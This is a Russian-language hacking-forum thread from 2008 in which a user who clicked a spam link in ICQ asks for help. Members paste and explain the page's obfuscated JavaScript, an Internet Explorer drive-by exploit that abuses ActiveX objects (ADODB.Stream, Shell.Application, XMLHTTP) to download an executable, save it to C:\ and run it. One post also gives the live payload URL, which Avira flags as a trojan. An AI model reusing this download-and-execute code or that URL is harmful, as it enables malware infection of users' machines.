лоханул в аське

Discussion in 'Болталка' started by console done, 13 May 2008.

  1. console done

    console done New Member

    Joined:
    13 Apr 2008
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Думал друг кинул сообщение с ссылкой так как он мне писал и в этот же момент пришла мессага от спамбота , я не заметил. Но перед тем как нажать проверил онлайн докторомвебом мне ничего не выдало и нажал :((
    Эта ссылка ( не нажимать , кто не в теме ) Там пустая страница и смайлик слева.

    Может кто проверить , есть там что ? Стоит последняя лиса и za .
     
    #1 console done, 13 May 2008
  2. grishka

    grishka Active Member

    Joined:
    11 Aug 2007
    Messages:
    157
    Likes Received:
    255
    Reputations:
    4
    смайл типа тебя поимели
     
    #2 grishka, 13 May 2008
  3. Petr

    Petr Banned

    Joined:
    10 Jun 2006
    Messages:
    642
    Likes Received:
    369
    Reputations:
    -13
    Просмотри хтмлку и скопируй сюда
     
    #3 Petr, 13 May 2008
  4. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    вот там што )))
    Code:
    function ZLFZz(){
try {
	var efds='';

  var aZxrwkh = document.createElement("obj"+efds+"e"+efds+"ct");
  aZxrwkh.setAttribute("id","a"+efds+"Zx"+efds+"rwkh");
aZxrwkh.setAttribute("class"+efds+"id","cls"+efds+"i"+efds+"d"+efds+":"+efds+"B"+efds+"D"+efds+"9"+efds+"6C5"+efds+"56-65A3"+efds+"-"+efds+"11D0-"+efds+"983"+efds+"A"+efds+"-"+efds+"00C"+efds+"04FC29E36");
var EkbSUoL = aZxrwkh.CreateObject("adodb"+efds+".stream",'');
var PEELt6 = aZxrwkh.CreateObject("S"+efds+"h"+efds+"el"+efds+"l"+efds+"."+efds+"A"+efds+"pplic"+efds+"ati"+efds+"on",'');
var dnigvr = aZxrwkh.CreateObject("msxml"+efds+"2"+efds+".X"+efds+"ML"+efds+"H"+efds+"T"+efds+"T"+efds+"P",'');
var jx89msS;
jx89msS=document.getElementById("sR28nH").innerText;

  dnigvr.open("G"+efds+"E"+efds+"T",jx89msS,false);
  dnigvr.send();
  EkbSUoL.type = 1;
  EkbSUoL.open();
EkbSUoL.Write(dnigvr.responseBody);
  Frogxa = "c:\\S87ekhV.exe";
EkbSUoL.SaveToFile(Frogxa,2);
eval("PEE"+efds+"Lt6.Shel"+efds+"lExec"+efds+"ute("+efds+"F"+efds+"rog"+efds+"xa);");
  }
  catch(e) {window.location="bof.php"};
  }
    сплоент какой то ... через адодб
     
    #4 geezer.code, 13 May 2008
    Last edited: 13 May 2008
  5. Petr

    Petr Banned

    Joined:
    10 Jun 2006
    Messages:
    642
    Likes Received:
    369
    Reputations:
    -13
    Типо должен был у тебя бразуер подвиснуть :)
     
    #5 Petr, 13 May 2008
  6. console done

    console done New Member

    Joined:
    13 Apr 2008
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    И всё :) ? Он внедрился в систему ? Его надо удалять?
     
    #6 console done, 13 May 2008
  7. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    он качает какуюто заразу(dnigvr.open("G"+efds+"E"+efds+"T",jx89msS,false);)
    потом сохраняет в корень С
    и запускает.

    отработал через эксплорер . про файрфокс не знаю.
     
    #7 geezer.code, 13 May 2008
  8. Jailer

    Jailer Elder - Старейшина

    Joined:
    21 Mar 2008
    Messages:
    37
    Likes Received:
    29
    Reputations:
    0
    аааа он внедрился к тебе! Мы все умрём!!!!!
    =)))
    на самом деле установи норм антивирь и он всё заблочит
     
    #8 Jailer, 13 May 2008
  9. console done

    console done New Member

    Joined:
    13 Apr 2008
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Ахтунг. Что делать?
     
    #9 console done, 13 May 2008
  10. Exlibris

    Exlibris Elder - Старейшина

    Joined:
    26 Feb 2007
    Messages:
    359
    Likes Received:
    394
    Reputations:
    27
    имена функций ппц =) какой то супер тарабарщ кодер ваял =))
    --
    Ну короче если не пострчно и не вникая во все эти стршные переменные, разобратся то сделалось слудующее:
    Функция, в ней сздается элемент(и не один), который в совю очередь на паге фигачит злодеяния(непонятные из за имен переменных(сложно разобратся)), потом короче все это сзодеяние незаметно для тебя открывается, так же открывая с собой файл(похоу вир0с) и отсылая и сохраня его тебе..в самом конце на скрипт bof.php
    --
    Короче вир0с ты поймал 99%
     
    #10 Exlibris, 13 May 2008
  11. grishka

    grishka Active Member

    Joined:
    11 Aug 2007
    Messages:
    157
    Likes Received:
    255
    Reputations:
    4
    Почиститься тебе надо
     
    #11 grishka, 13 May 2008
  12. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    сам пайлоад лежит тут http://myphotos.myokhost.com/exe.php
    тока запускать его не надо


    Авира палит его как
    TR/Crypt.XPACK.Gen - Trojan
     
    #12 geezer.code, 13 May 2008
    Last edited: 13 May 2008
  13. astrologer

    astrologer Elder - Старейшина

    Joined:
    30 Aug 2007
    Messages:
    837
    Likes Received:
    267
    Reputations:
    59
    Это vbscript, cплоит только под ie.
    Они рандомные.
     
    #13 astrologer, 13 May 2008
  14. Petr

    Petr Banned

    Joined:
    10 Jun 2006
    Messages:
    642
    Likes Received:
    369
    Reputations:
    -13
    Они стебут тебя, должен переполнится буфер!
     
    #14 Petr, 13 May 2008
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.